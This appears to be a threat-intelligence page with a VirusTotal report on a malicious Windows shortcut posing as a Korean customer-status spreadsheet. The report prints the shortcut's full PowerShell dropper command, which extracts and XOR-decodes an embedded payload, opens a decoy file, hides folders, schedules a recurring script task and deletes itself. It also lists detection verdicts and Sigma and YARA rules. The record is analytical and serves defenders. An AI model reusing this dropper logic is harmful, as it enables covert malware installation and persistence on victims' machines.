4c3fb7a00ede6a719450c63a1b6e7e1d
Hash
- MD5: 4c3fb7a00ede6a719450c63a1b6e7e1d
- SHA1: e28c43ca68eda22b5737fe54098e524418e6fad3
- SHA256: ef2d2c5d9a668e57a367491d5eeacb604eb29ff5f2a92423e7ee589a940baa25
- First Seen: 2026-06-09
- Last Seen: 2026-06-09
- Related Reports: 1
- Related IOCs: 0
Additional Information
VirusTotal
{
"data": {
"id": "ef2d2c5d9a668e57a367491d5eeacb604eb29ff5f2a92423e7ee589a940baa25",
"type": "file",
"links": {
"self": "https://www.virustotal.com/api/v3/files/ef2d2c5d9a668e57a367491d5eeacb604eb29ff5f2a92423e7ee589a940baa25"
},
"attributes": {
"sha256": "ef2d2c5d9a668e57a367491d5eeacb604eb29ff5f2a92423e7ee589a940baa25",
"reputation": 0,
"magika": "LNK",
"lnk_info": {
"modification_date": "1970-01-01T00:00:00Z",
"link_flags": [
"HasName",
"IsUnicode",
"HasExprString",
"HasArguments",
"PreferEnvironmentPath",
"HasIconLocation"
],
"command_line_arguments": "\ufeff/k for /f \"tokens=*\" %a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\powershell.exe /s /b /od') do call %a \" $eoto=@('.lnk');$GetCurLoc = Get-Location; if($GetCurLoc -Match 'System32' -or $GetCurLoc -Match 'Program Files') {$GetCurLoc = '%temp%'};$sLonP = Get-ChildItem -Path $GetCurLoc -Recurse *.* -File | where {$_.extension -in $eoto} | where-object {$_.length -eq 0x0001DE4C} | Select-Object -ExpandProperty FullName; $bAlloD=[System.IO.File]::Open($sLonP,[System.IO.FileMode]::Open,[System.IO.FileAccess]::Read);$bAlloD.Position=0x000012AA; $bNormD=New-Object byte[] 0x0001AD92; $bAlloD.Read($bNormD,0,0x0001AD92); $fNormP = $sLonP.replace('.lnk','.xlsx');sc $fNormP $bNormD -Encoding Byte;& $fNormP;$sMainD='C:\\ProgramData\\vaccine'; if(-not(Test-Path $sMainD)) {mkdir $sMainD};attrib +h +s $sMainD; $sWDir00='C:\\ProgramData\\NuGetx';if(-not(Test-Path $sWDir00)) {mkdir $sWDir00};attrib +h +s $sWDir00; $bAlloD.Position=0x0001C03C; $bPayD=New-Object byte[] 0x00001E10; $bAlloD.Read($bPayD, 0, 0x00001E10);$fJoyP=$sMainD +'\\joyment98';$xyz=0; while($xyz -lt 0x00001E10) {$bTmpD=$bPayD[$xyz];$bPayD[$xyz]=$bTmpD -bxor 0xBF; $xyz++;} sc $fJoyP $bPayD -Encoding Byte; tar -xf $fJoyP -C $sWDir00; $fJosoEoF=$sMainD +'\\WCF35Setup.js'; $fJosoEoSoF=$sWDir00 +'\\WCF35Setup.js'; Move-Item -Path $fJosoEoSoF -Destination $fJosoEoF -Force; $e = 'wscript.exe'; $ag = ' /B /NoLogo '+ $fJosoEoF; $s0='New-S'; $s1='cheduledT'; $s2='ask'; $sAc='Action'; $sTrg='Trigger'; $sStg='SettingsSet'; $sReg='Register-S'; $st = (Get-Date).AddMinutes(1);$act = (&($s0+$s1+$s2+$sAc) -Execute $e -Argument $ag);$tg = (&($s0+$s1+$s2+$sTrg) -Once -At $st -RepetitionInterval (New-TimeSpan -Minutes 16));$setg = (&($s0+$s1+$s2+$sStg) -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries);&($sReg+$s1+$s2) -Action $act -Trigger $tg -TaskName 'Intel(R) Ethernet2 Connection 2509-PM' -Settings $setg -Force; Remove-Item $sLonP -Force; Remove-Item $fJoyP -Force;\" && exit",
"icon_location": ".xlsx",
"creation_date": "1970-01-01T00:00:00Z",
"header": {
"show_window": 7,
"file_size": 0,
"hot_key": "(0+0)",
"show_window_str": "SW_SHOWMINNOACTIVE"
},
"access_date": "1970-01-01T00:00:00Z"
},
"last_analysis_stats": {
"malicious": 28,
"suspicious": 0,
"undetected": 34,
"harmless": 0,
"timeout": 0,
"confirmed-timeout": 0,
"failure": 0,
"type-unsupported": 13
},
"sha1": "e28c43ca68eda22b5737fe54098e524418e6fad3",
"meaningful_name": "\uace0\uac1d\ud604\ud669_202605.lnk",
"sigma_analysis_stats": {
"critical": 0,
"high": 2,
"medium": 5,
"low": 2
},
"last_analysis_date": 1780245504,
"filecondis": {
"dhash": "0000181c1d240000",
"raw_md5": "9807e0de32a0f4e1449c7cd606fadb03"
},
"trid": [
{
"file_type": "Windows Shortcut",
"probability": 100.0
}
],
"popular_threat_classification": {
"popular_threat_category": [
{
"count": 14,
"value": "trojan"
},
{
"count": 2,
"value": "dropper"
},
{
"count": 1,
"value": "downloader"
}
],
"suggested_threat_label": "trojan.pantera/powecod",
"popular_threat_name": [
{
"count": 7,
"value": "pantera"
},
{
"count": 3,
"value": "powecod"
},
{
"count": 2,
"value": "lnkdrop"
}
]
},
"last_analysis_results": {
"Bkav": {
"method": "blacklist",
"engine_name": "Bkav",
"engine_version": "8.2.40(8338)",
"engine_update": "20260530",
"category": "malicious",
"result": "LNK.ScriptQH.Trojan"
},
"Lionic": {
"method": "blacklist",
"engine_name": "Lionic",
"engine_version": "8.16",
"engine_update": "20260531",
"category": "undetected",
"result": null
},
"MicroWorld-eScan": {
"method": "blacklist",
"engine_name": "MicroWorld-eScan",
"engine_version": "14.0.409.0",
"engine_update": "20260531",
"category": "malicious",
"result": "CMD:Heur.BZC.YAX.Pantera.190.EDCE415F"
},
"ClamAV": {
"method": "blacklist",
"engine_name": "ClamAV",
"engine_version": "1.5.2.0",
"engine_update": "20260531",
"category": "undetected",
"result": null
},
"CTX": {
"method": "blacklist",
"engine_name": "CTX",
"engine_version": "2024.8.29.1",
"engine_update": "20260531",
"category": "malicious",
"result": "lnk.trojan.pantera"
},
"CAT-QuickHeal": {
"method": "blacklist",
"engine_name": "CAT-QuickHeal",
"engine_version": "22.00",
"engine_update": "20260530",
"category": "malicious",
"result": "Lnk.Trojan.A25878738"
},
"Skyhigh": {
"method": "blacklist",
"engine_name": "Skyhigh",
"engine_version": "v2021.2.0+4045",
"engine_update": "20260531",
"category": "malicious",
"result": "BehavesLike.Trojan.cb"
},
"ALYac": {
"method": "blacklist",
"engine_name": "ALYac",
"engine_version": "2.0.0.10",
"engine_update": "20260531",
"category": "undetected",
"result": null
},
"Malwarebytes": {
"method": "blacklist",
"engine_name": "Malwarebytes",
"engine_version": "3.1.0.235",
"engine_update": "20260531",
"category": "undetected",
"result": null
},
"Zillya": {
"method": "blacklist",
"engine_name": "Zillya",
"engine_version": "2.0.0.5611",
"engine_update": "20260529",
"category": "undetected",
"result": null
},
"Sangfor": {
"method": "blacklist",
"engine_name": "Sangfor",
"engine_version": "2.22.3.0",
"engine_update": "20260529",
"category": "undetected",
"result": null
},
"K7AntiVirus": {
"method": "blacklist",
"engine_name": "K7AntiVirus",
"engine_version": "14.54.59670",
"engine_update": "20260531",
"category": "undetected",
"result": null
},
"K7GW": {
"method": "blacklist",
"engine_name": "K7GW",
"engine_version": "14.54.59672",
"engine_update": "20260531",
"category": "undetected",
"result": null
},
"CrowdStrike": {
"method": "blacklist",
"engine_name": "CrowdStrike",
"engine_version": "1.0",
"engine_update": "20251219",
"category": "undetected",
"result": null
},
"Arcabit": {
"method": "blacklist",
"engine_name": "Arcabit",
"engine_version": "2025.0.0.23",
"engine_update": "20260531",
"category": "malicious",
"result": "CMD:Heur.BZC.YAX.Pantera.190.EDCE415F"
},
"huorong": {
"method": "blacklist",
"engine_name": "huorong",
"engine_version": "1925a7e:1925a7e:354c4d2:354c4d2",
"engine_update": "20260531",
"category": "malicious",
"result": "TrojanDownloader/LNK.Starter.a"
},
"VirIT": {
"method": "blacklist",
"engine_name": "VirIT",
"engine_version": "9.5.1218",
"engine_update": "20260529",
"category": "undetected",
"result": null
},
"Symantec": {
"method": "blacklist",
"engine_name": "Symantec",
"engine_version": "1.22.0.0",
"engine_update": "20260531",
"category": "malicious",
"result": "Scr.Malcode!gen"
},
"ESET-NOD32": {
"method": "blacklist",
"engine_name": "ESET-NOD32",
"engine_version": "18.2.18.0",
"engine_update": "20260531",
"category": "malicious",
"result": "LNK/TrojanDropper.Agent.EO trojan"
},
"TrendMicro-HouseCall": {
"method": "blacklist",
"engine_name": "TrendMicro-HouseCall",
"engine_version": "24.550.0.1002",
"engine_update": "20260531",
"category": "malicious",
"result": "HEUR_LNKEXEC.A"
},
"Avast": {
"method": "blacklist",
"engine_name": "Avast",
"engine_version": "23.9.8494.0",
"engine_update": "20260531",
"category": "undetected",
"result": null
},
"Cynet": {
"method": "blacklist",
"engine_name": "Cynet",
"engine_version": "4.0.3.4",
"engine_update": "20260531",
"category": "undetected",
"result": null
},
"Kaspersky": {
"method": "blacklist",
"engine_name": "Kaspersky",
"engine_version": "22.0.1.28",
"engine_update": "20260531",
"category": "malicious",
"result": "HEUR:Trojan.WinLNK.Powecod.c"
},
"BitDefender": {
"method": "blacklist",
"engine_name": "BitDefender",
"engine_version": "7.2",
"engine_update": "20260531",
"category": "malicious",
"result": "CMD:Heur.BZC.YAX.Pantera.190.EDCE415F"
},
"NANO-Antivirus": {
"method": "blacklist",
"engine_name": "NANO-Antivirus",
"engine_version": "1.0.170.26895",
"engine_update": "20260531",
"category": "undetected",
"result": null
},
"ViRobot": {
"method": "blacklist",
"engine_name": "ViRobot",
"engine_version": "2014.3.20.0",
"engine_update": "20260531",
"category": "undetected",
"result": null
},
"Rising": {
"method": "blacklist",
"engine_name": "Rising",
"engine_version": "25.0.0.28",
"engine_update": "20260531",
"category": "malicious",
"result": "Trojan.Agent/LNK!1.AA03 (CLASSIC)"
},
"Sophos": {
"method": "blacklist",
"engine_name": "Sophos",
"engine_version": "3.5.1.0",
"engine_update": "20260531",
"category": "malicious",
"result": "Troj/LnkDrop-M"
},
"F-Secure": {
"method": "blacklist",
"engine_name": "F-Secure",
"engine_version": "18.10.1547.307",
"engine_update": "20260531",
"category": "undetected",
"result": null
},
"DrWeb": {
"method": "blacklist",
"engine_name": "DrWeb",
"engine_version": "7.0.75.2070",
"engine_update": "20260531",
"category": "undetected",
"result": null
},
"VIPRE": {
"method": "blacklist",
"engine_name": "VIPRE",
"engine_version": "6.0.0.35",
"engine_update": "20260531",
"category": "malicious",
"result": "CMD:Heur.BZC.YAX.Pantera.190.EDCE415F"
},
"TrendMicro": {
"method": "blacklist",
"engine_name": "TrendMicro",
"engine_version": "24.550.0.1002",
"engine_update": "20260531",
"category": "malicious",
"result": "HEUR_LNKEXEC.A"
},
"McAfeeD": {
"method": "blacklist",
"engine_name": "McAfeeD",
"engine_version": "1.2.0.14833",
"engine_update": "20260531",
"category": "malicious",
"result": "ti!EF2D2C5D9A66"
},
"CMC": {
"method": "blacklist",
"engine_name": "CMC",
"engine_version": "2.4.2022.1",
"engine_update": "20260531",
"category": "undetected",
"result": null
},
"Emsisoft": {
"method": "blacklist",
"engine_name": "Emsisoft",
"engine_version": "2024.8.0.61147",
"engine_update": "20260531",
"category": "malicious",
"result": "CMD:Heur.BZC.YAX.Pantera.190.EDCE415F (B)"
},
"Ikarus": {
"method": "blacklist",
"engine_name": "Ikarus",
"engine_version": "6.4.16.0",
"engine_update": "20260531",
"category": "malicious",
"result": "Trojan-Dropper.LNK.Agent"
},
"Jiangmin": {
"method": "blacklist",
"engine_name": "Jiangmin",
"engine_version": "16.0.100",
"engine_update": "20260530",
"category": "undetected",
"result": null
},
"Varist": {
"method": "blacklist",
"engine_name": "Varist",
"engine_version": "6.6.1.3",
"engine_update": "20260531",
"category": "undetected",
"result": null
},
"Avira": {
"method": "blacklist",
"engine_name": "Avira",
"engine_version": "8.3.3.24",
"engine_update": "20260531",
"category": "undetected",
"result": null
},
"Antiy-AVL": {
"method": "blacklist",
"engine_name": "Antiy-AVL",
"engine_version": "3.0",
"engine_update": "20260531",
"category": "undetected",
"result": null
},
"Kingsoft": {
"method": "blacklist",
"engine_name": "Kingsoft",
"engine_version": "None",
"engine_update": "20260607",
"category": "undetected",
"result": null
},
"Gridinsoft": {
"method": "blacklist",
"engine_name": "Gridinsoft",
"engine_version": "1.0.247.174",
"engine_update": "20260531",
"category": "undetected",
"result": null
},
"Xcitium": {
"method": "blacklist",
"engine_name": "Xcitium",
"engine_version": "38690",
"engine_update": "20260531",
"category": "undetected",
"result": null
},
"Microsoft": {
"method": "blacklist",
"engine_name": "Microsoft",
"engine_version": "1.1.26040.8",
"engine_update": "20260531",
"category": "malicious",
"result": "Trojan:Win32/Qwexlafiba!rfn"
},
"SUPERAntiSpyware": {
"method": "blacklist",
"engine_name": "SUPERAntiSpyware",
"engine_version": "5.6.0.1032",
"engine_update": "20260530",
"category": "undetected",
"result": null
},
"ZoneAlarm": {
"method": "blacklist",
"engine_name": "ZoneAlarm",
"engine_version": "6.25-116107203",
"engine_update": "20260531",
"category": "malicious",
"result": "Troj/LnkDrop-M"
},
"GData": {
"method": "blacklist",
"engine_name": "GData",
"engine_version": "GD:27.44742AVA:64.31339",
"engine_update": "20260531",
"category": "malicious",
"result": "CMD:Heur.BZC.YAX.Pantera.190.EDCE415F"
},
"Google": {
"method": "blacklist",
"engine_name": "Google",
"engine_version": "1780236054",
"engine_update": "20260531",
"category": "malicious",
"result": "Detected"
},
"AhnLab-V3": {
"method": "blacklist",
"engine_name": "AhnLab-V3",
"engine_version": "3.30.0.10666",
"engine_update": "20260531",
"category": "undetected",
"result": null
},
"Acronis": {
"method": "blacklist",
"engine_name": "Acronis",
"engine_version": "1.2.0.121",
"engine_update": "20240328",
"category": "undetected",
"result": null
},
"VBA32": {
"method": "blacklist",
"engine_name": "VBA32",
"engine_version": "5.6.1",
"engine_update": "20260529",
"category": "malicious",
"result": "Trojan.Link.DoubleRun"
},
"TACHYON": {
"method": "blacklist",
"engine_name": "TACHYON",
"engine_version": "2026-05-31.01",
"engine_update": "20260531",
"category": "undetected",
"result": null
},
"Zoner": {
"method": "blacklist",
"engine_name": "Zoner",
"engine_version": "2.2.2.0",
"engine_update": "20260531",
"category": "undetected",
"result": null
},
"Tencent": {
"method": "blacklist",
"engine_name": "Tencent",
"engine_version": "1.0.0.1",
"engine_update": "20260531",
"category": "malicious",
"result": "Win32.Trojan.Powecod.Gwnw"
},
"Yandex": {
"method": "blacklist",
"engine_name": "Yandex",
"engine_version": "5.5.2.24",
"engine_update": "20260531",
"category": "undetected",
"result": null
},
"TrellixENS": {
"method": "blacklist",
"engine_name": "TrellixENS",
"engine_version": "6.0.6.653",
"engine_update": "20260531",
"category": "malicious",
"result": "Artemis!4C3FB7A00EDE"
},
"SentinelOne": {
"method": "blacklist",
"engine_name": "SentinelOne",
"engine_version": "7.6.2.19",
"engine_update": "20260324",
"category": "undetected",
"result": null
},
"MaxSecure": {
"method": "blacklist",
"engine_name": "MaxSecure",
"engine_version": "1.0.0.1",
"engine_update": "20260529",
"category": "undetected",
"result": null
},
"Fortinet": {
"method": "blacklist",
"engine_name": "Fortinet",
"engine_version": "7.0.48.0",
"engine_update": "20260531",
"category": "malicious",
"result": "LNK/Agent.HV!tr"
},
"AVG": {
"method": "blacklist",
"engine_name": "AVG",
"engine_version": "23.9.8494.0",
"engine_update": "20260531",
"category": "undetected",
"result": null
},
"Panda": {
"method": "blacklist",
"engine_name": "Panda",
"engine_version": "4.6.4.2",
"engine_update": "20260531",
"category": "undetected",
"result": null
},
"alibabacloud": {
"method": "blacklist",
"engine_name": "alibabacloud",
"engine_version": "2.2.0",
"engine_update": "20250321",
"category": "malicious",
"result": "Trojan:Win/Powecod.c"
},
"Avast-Mobile": {
"method": "blacklist",
"engine_name": "Avast-Mobile",
"engine_version": "260531-02",
"engine_update": "20260531",
"category": "type-unsupported",
"result": null
},
"SymantecMobileInsight": {
"method": "blacklist",
"engine_name": "SymantecMobileInsight",
"engine_version": "2.0",
"engine_update": "20260123",
"category": "type-unsupported",
"result": null
},
"BitDefenderFalx": {
"method": "blacklist",
"engine_name": "BitDefenderFalx",
"engine_version": "2.0.936",
"engine_update": "20260525",
"category": "type-unsupported",
"result": null
},
"DeepInstinct": {
"method": "blacklist",
"engine_name": "DeepInstinct",
"engine_version": "5.0.0.8",
"engine_update": "20260529",
"category": "type-unsupported",
"result": null
},
"Elastic": {
"method": "blacklist",
"engine_name": "Elastic",
"engine_version": "4.0.264",
"engine_update": "20260528",
"category": "type-unsupported",
"result": null
},
"Webroot": {
"method": "blacklist",
"engine_name": "Webroot",
"engine_version": "1.10.0.2",
"engine_update": "20250227",
"category": "type-unsupported",
"result": null
},
"APEX": {
"method": "blacklist",
"engine_name": "APEX",
"engine_version": "6.783",
"engine_update": "20260528",
"category": "type-unsupported",
"result": null
},
"Paloalto": {
"method": "blacklist",
"engine_name": "Paloalto",
"engine_version": "0.9.0.1003",
"engine_update": "20260531",
"category": "type-unsupported",
"result": null
},
"Alibaba": {
"method": "blacklist",
"engine_name": "Alibaba",
"engine_version": "0.3.0.5",
"engine_update": "20190527",
"category": "type-unsupported",
"result": null
},
"Trapmine": {
"method": "blacklist",
"engine_name": "Trapmine",
"engine_version": "4.0.12.0",
"engine_update": "20260504",
"category": "type-unsupported",
"result": null
},
"Cylance": {
"method": "blacklist",
"engine_name": "Cylance",
"engine_version": "3.0.0.0",
"engine_update": "20260521",
"category": "type-unsupported",
"result": null
},
"tehtris": {
"method": "blacklist",
"engine_name": "tehtris",
"engine_version": "v0.1.4",
"engine_update": "20260531",
"category": "type-unsupported",
"result": null
},
"Trustlook": {
"method": "blacklist",
"engine_name": "Trustlook",
"engine_version": "1.0",
"engine_update": "20260531",
"category": "type-unsupported",
"result": null
}
},
"magic": "MS Windows shortcut, Has Description string, Has command line arguments, Icon number=0, ctime=Thu Dec 31 23:59:59 1969, mtime=Thu Dec 31 23:59:59 1969, atime=Thu Dec 31 23:59:59 1969, length=0, window=hidenormalshowminimized",
"ssdeep": "3072:IPo2dSIqwmGuIOW2Pmu9QiivVe4LD0VDEmIDeRsbY7F0/bpH5FJe3:sRduIOWymkQlvV/D+4bess7O//FJe3",
"tags": [
"lnk",
"idle",
"large-file",
"high-entropy",
"abused-exe-pattern",
"hiding-window",
"long-command-line-arguments"
],
"last_submission_date": 1779955119,
"times_submitted": 2,
"vhash": "936900f6b57796e18960fb28f7f8f244",
"names": [
"\uace0\uac1d\ud604\ud669_202605.lnk",
"????_202605.lnk"
],
"type_description": "Windows shortcut",
"sigma_analysis_summary": {
"Sigma Integrated Rule Set (GitHub)": {
"critical": 0,
"high": 2,
"medium": 5,
"low": 2
}
},
"first_seen_itw_date": 1779965531,
"size": 122444,
"sigma_analysis_results": [
{
"rule_level": "high",
"rule_id": "afdcecbde34527044e8c4c24e502ed3dfae6daa2d07665ad18226afff77ed6fe",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Set Suspicious Files as System Files Using Attrib.EXE",
"rule_description": "Detects the usage of attrib with the \"+s\" option to set scripts or executables located in suspicious locations as system files to hide them from users and make them unable to be deleted with simple rights. The rule limits the search to specific extensions and directories to avoid FPs\n",
"rule_author": "Nasreddine Bencherchali (Nextron Systems)",
"match_context": [
{
"values": {
"CommandLine": "C:\\Windows\\system32\\attrib.exe +h +s C:\\ProgramData\\vaccine",
"Image": "C:\\Windows\\system32\\attrib.exe",
"EventID": "1"
}
},
{
"values": {
"CommandLine": "C:\\Windows\\system32\\attrib.exe +h +s C:\\ProgramData\\NuGetx",
"Image": "C:\\Windows\\system32\\attrib.exe",
"EventID": "1"
}
}
]
},
{
"rule_level": "high",
"rule_id": "e6fdb32f143bba16a3ea06247ced55b7b90f8b5b5c6c26ddb95cdcf23908af8a",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Potential PowerShell Command Line Obfuscation",
"rule_description": "Detects the PowerShell command lines with special characters",
"rule_author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp)",
"match_context": [
{
"values": {
"CommandLine": "C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\powershell.exe $eoto=@('.lnk');$GetCurLoc = Get-Location; if($GetCurLoc -Match 'System32' -or $GetCurLoc -Match 'Program Files') {$GetCurLoc = 'C:\\Users\\<USER>\\AppData\\Local\\Temp'};$sLonP = Get-ChildItem -Path $GetCurLoc -Recurse *.* -File | where {$_.extension -in $eoto} | where-object {$_.length -eq 0x0001DE4C} | Select-Object -ExpandProperty FullName; $bAlloD=[System.IO.File]::Open($sLonP,[System.IO.FileMode]::Open,[System.IO.FileAccess]::Read);$bAl [TRUNCATED]",
"Image": "C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\powershell.exe",
"EventID": "1"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "0db9fba426142aca003830de31e38a7318ed0a3a299852f6bc4cbe8bc905515f",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Read Contents From Stdin Via Cmd.EXE",
"rule_description": "Detect the use of \"<\" to read and potentially execute a file via cmd.exe",
"rule_author": "frack113, Nasreddine Bencherchali (Nextron Systems)",
"match_context": [
{
"values": {
"CommandLine": "C:\\Windows\\SysWOW64\\cmd.exe \ufeff/k for /f tokens=* %a in (dir C:\\\\Windows\\\\SysWow64\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe /s /b /od) do call %a $eoto=@('.lnk');$GetCurLoc = Get-Location; if($GetCurLoc -Match 'System32' -or $GetCurLoc -Match 'Program Files') {$GetCurLoc = 'C:\\Users\\<USER>\\AppData\\Local\\Temp'};$sLonP = Get-ChildItem -Path $GetCurLoc -Recurse *.* -File | where {$_.extension -in $eoto} | where-object {$_.length -eq 0x0001DE4C} | Select-Object -ExpandProperty FullName; $bAlloD=[Syst [TRUNCATED]",
"Image": "C:\\Windows\\SysWOW64\\cmd.exe",
"EventID": "1"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "511fcd38b1cd4057f3b3568707032548bac72899a4b3c932f3614c6d89d417bd",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Automated Collection Command Prompt",
"rule_description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.",
"rule_author": "frack113",
"match_context": [
{
"values": {
"CommandLine": "C:\\Windows\\SysWOW64\\cmd.exe \ufeff/k for /f tokens=* %a in (dir C:\\\\Windows\\\\SysWow64\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe /s /b /od) do call %a $eoto=@('.lnk');$GetCurLoc = Get-Location; if($GetCurLoc -Match 'System32' -or $GetCurLoc -Match 'Program Files') {$GetCurLoc = 'C:\\Users\\<USER>\\AppData\\Local\\Temp'};$sLonP = Get-ChildItem -Path $GetCurLoc -Recurse *.* -File | where {$_.extension -in $eoto} | where-object {$_.length -eq 0x0001DE4C} | Select-Object -ExpandProperty FullName; $bAlloD=[Syst [TRUNCATED]",
"Image": "C:\\Windows\\SysWOW64\\cmd.exe",
"EventID": "1"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "5c3ea6806114163b8cdf5735aeb07e702ab63e0e486f721df84cf675e2b0a04b",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Hiding Files with Attrib.exe",
"rule_description": "Detects usage of attrib.exe to hide files from users.",
"rule_author": "Sami Ruohonen",
"match_context": [
{
"values": {
"CommandLine": "C:\\Windows\\system32\\attrib.exe +h +s C:\\ProgramData\\vaccine",
"Image": "C:\\Windows\\system32\\attrib.exe",
"EventID": "1"
}
},
{
"values": {
"CommandLine": "C:\\Windows\\system32\\attrib.exe +h +s C:\\ProgramData\\NuGetx",
"Image": "C:\\Windows\\system32\\attrib.exe",
"EventID": "1"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "96d2c399118cab5d249093badf4a85f0ef1889872b0191bdf131bcabc0994681",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Potentially Suspicious Powershell Script Execution From Temp Folder",
"rule_description": "Detects a potentially suspicious powershell script executions from temporary folder",
"rule_author": "Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton",
"match_context": [
{
"values": {
"CommandLine": "C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\powershell.exe $eoto=@('.lnk');$GetCurLoc = Get-Location; if($GetCurLoc -Match 'System32' -or $GetCurLoc -Match 'Program Files') {$GetCurLoc = 'C:\\Users\\<USER>\\AppData\\Local\\Temp'};$sLonP = Get-ChildItem -Path $GetCurLoc -Recurse *.* -File | where {$_.extension -in $eoto} | where-object {$_.length -eq 0x0001DE4C} | Select-Object -ExpandProperty FullName; $bAlloD=[System.IO.File]::Open($sLonP,[System.IO.FileMode]::Open,[System.IO.FileAccess]::Read);$bAl [TRUNCATED]",
"Image": "C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\powershell.exe",
"EventID": "1"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "c50af4c9fd0606d73bbfb8615f9f4e6ead04b5e20ce70f292af065c18f9e63c4",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Suspicious Usage of For Loop with Recursive Directory Search in CMD",
"rule_description": "Detects suspicious usage of the cmd.exe 'for /f' loop combined with the 'tokens=' parameter and a recursive directory listing.\nThis pattern may indicate an attempt to discover and execute system binaries dynamically, for example powershell, a technique sometimes used by attackers to evade detection.\nThis behavior has been observed in various malicious lnk files.\n",
"rule_author": "Joseliyo Sanchez, @Joseliyo_Jstnk",
"match_context": [
{
"values": {
"CommandLine": "C:\\Windows\\SysWOW64\\cmd.exe \ufeff/k for /f tokens=* %a in (dir C:\\\\Windows\\\\SysWow64\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe /s /b /od) do call %a $eoto=@('.lnk');$GetCurLoc = Get-Location; if($GetCurLoc -Match 'System32' -or $GetCurLoc -Match 'Program Files') {$GetCurLoc = 'C:\\Users\\<USER>\\AppData\\Local\\Temp'};$sLonP = Get-ChildItem -Path $GetCurLoc -Recurse *.* -File | where {$_.extension -in $eoto} | where-object {$_.length -eq 0x0001DE4C} | Select-Object -ExpandProperty FullName; $bAlloD=[Syst [TRUNCATED]",
"Image": "C:\\Windows\\SysWOW64\\cmd.exe",
"EventID": "1"
}
}
]
},
{
"rule_level": "low",
"rule_id": "1c2e4db94ca79f939e94e29c04fb3b71467fc6f5b9c31db34fcce5a2fb3b856f",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Non Interactive PowerShell Process Spawned",
"rule_description": "Detects non-interactive PowerShell activity by looking at the \"powershell\" process with a non-user GUI process such as \"explorer.exe\" as a parent.",
"rule_author": "Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)",
"match_context": [
{
"values": {
"CommandLine": "C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\powershell.exe $eoto=@('.lnk');$GetCurLoc = Get-Location; if($GetCurLoc -Match 'System32' -or $GetCurLoc -Match 'Program Files') {$GetCurLoc = 'C:\\Users\\<USER>\\AppData\\Local\\Temp'};$sLonP = Get-ChildItem -Path $GetCurLoc -Recurse *.* -File | where {$_.extension -in $eoto} | where-object {$_.length -eq 0x0001DE4C} | Select-Object -ExpandProperty FullName; $bAlloD=[System.IO.File]::Open($sLonP,[System.IO.FileMode]::Open,[System.IO.FileAccess]::Read);$bAl [TRUNCATED]",
"Image": "C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\powershell.exe",
"EventID": "1"
}
}
]
},
{
"rule_level": "low",
"rule_id": "7752bbd4e940ef58081260cfa45b4ac6b149e2cecb836d79f5e61bfbdc237105",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "File And SubFolder Enumeration Via Dir Command",
"rule_description": "Detects usage of the \"dir\" command part of Windows CMD with the \"/S\" command line flag in order to enumerate files in a specified directory and all subdirectories.\n",
"rule_author": "frack113",
"match_context": [
{
"values": {
"CommandLine": "C:\\Windows\\SysWOW64\\cmd.exe \ufeff/k for /f tokens=* %a in (dir C:\\\\Windows\\\\SysWow64\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe /s /b /od) do call %a $eoto=@('.lnk');$GetCurLoc = Get-Location; if($GetCurLoc -Match 'System32' -or $GetCurLoc -Match 'Program Files') {$GetCurLoc = 'C:\\Users\\<USER>\\AppData\\Local\\Temp'};$sLonP = Get-ChildItem -Path $GetCurLoc -Recurse *.* -File | where {$_.extension -in $eoto} | where-object {$_.length -eq 0x0001DE4C} | Select-Object -ExpandProperty FullName; $bAlloD=[Syst [TRUNCATED]",
"Image": "C:\\Windows\\SysWOW64\\cmd.exe",
"EventID": "1"
}
},
{
"values": {
"CommandLine": "C:\\Windows\\system32\\cmd.exe /c dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\powershell.exe /s /b /od",
"Image": "C:\\Windows\\system32\\cmd.exe",
"EventID": "1"
}
}
]
}
],
"type_tag": "lnk",
"first_submission_date": 1779953131,
"md5": "4c3fb7a00ede6a719450c63a1b6e7e1d",
"total_votes": {
"harmless": 0,
"malicious": 0
},
"type_extension": "lnk",
"crowdsourced_yara_results": [
{
"ruleset_id": "002bb473a9",
"ruleset_version": "002bb473a9|d1fd450ec7c73f71e829d8f39a46e82e73687778",
"ruleset_name": "LNK_Ruleset",
"rule_name": "Large_filesize_LNK",
"match_date": 1780245601,
"description": "Identifies shortcut (LNK) file larger than 100KB. Most goodware LNK files are smaller than 100KB.",
"author": "@bartblaze",
"source": "https://github.com/bartblaze/Yara-rules"
},
{
"ruleset_id": "002bb473a9",
"ruleset_version": "002bb473a9|d1fd450ec7c73f71e829d8f39a46e82e73687778",
"ruleset_name": "LNK_Ruleset",
"rule_name": "High_Entropy_LNK",
"match_date": 1780245601,
"description": "Identifies shortcut (LNK) file with equal or higher entropy than 6.5. Most goodware LNK files have a low entropy, lower than 6.",
"author": "@bartblaze",
"source": "https://github.com/bartblaze/Yara-rules"
},
{
"ruleset_id": "002bb473a9",
